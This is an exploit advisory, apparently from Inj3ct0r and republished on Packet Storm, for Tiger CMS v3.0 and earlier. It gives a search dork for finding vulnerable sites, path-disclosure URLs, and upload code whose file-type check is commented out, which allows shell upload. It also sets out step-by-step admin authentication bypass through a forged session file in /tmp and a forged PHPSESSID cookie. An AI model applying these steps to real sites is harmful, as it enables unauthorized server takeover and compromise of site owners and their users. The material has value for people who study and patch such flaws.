Tiger CMS versions 3.0 and below suffer from an administrative bypass vulnerability that allows shell access.
8de5444c56f8861a2ca6b56d04cc050987567d2be3dbbeb2ac0b6ce66a9519da==========================================
TIGER CMS <= v3.0 Bypass admin / get shell
==========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Product : TIGER CMS
Vesrion : v3.0
Site : http://tigercms.com/
Dork:"Powered by TIGER CMS v3.0"
Path Disclosure
Sample : http://bobruisk.name/admin/engine/modules/uploads/
Usage:
http://site.com/path/admin/engine/modules/[module_name]
Standard modules, which are suitable for this purpose:
uploads
content
links
metatags
news
pass
templates
Filling an arbitrary file
Unclear why, but the fault of all - 2 default lines.
PHP code:
$type = strtolower(substr($filename, 1 + strrpos($filename, ".")));
//$types_ok = array("jpg", "bmp", "gif", "png");
//if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Íåâåðíûé ôîðìàò ôàéëà.");
$new_name = 'tiger-'.time().'.'.$type;
$a = copy($file, "../uploads/".$new_name);
$path_all = getenv("SERVER_NAME");
Example:
http://site.com/path/admin/?task=uploads&sub_task=add
Bypass authentication to the admin.
Need:
Shell on the neighboring site
Access to write to the / tmp
Vulnerable code:
admin/login/login2.php
PHP code:
$_SESSION['user_id_admin'] = $id_admin;
$Admins->SuccessAuth($login);
For a successful login, we will need to login admin. Venture to suggest that it is "admin"
Represents sesiyu:
Name: sess_0526152ea0fed5dbbfca86639e0f6fa7
Contents:
user_id_admin | s: 1: "1";
Keeping in / tmp
Do not forget to right 777!
Next forges cookies in your browser:
PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7
Go:
http://site.com/path/admin/, successfully passed authentication pour shell as described above.
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed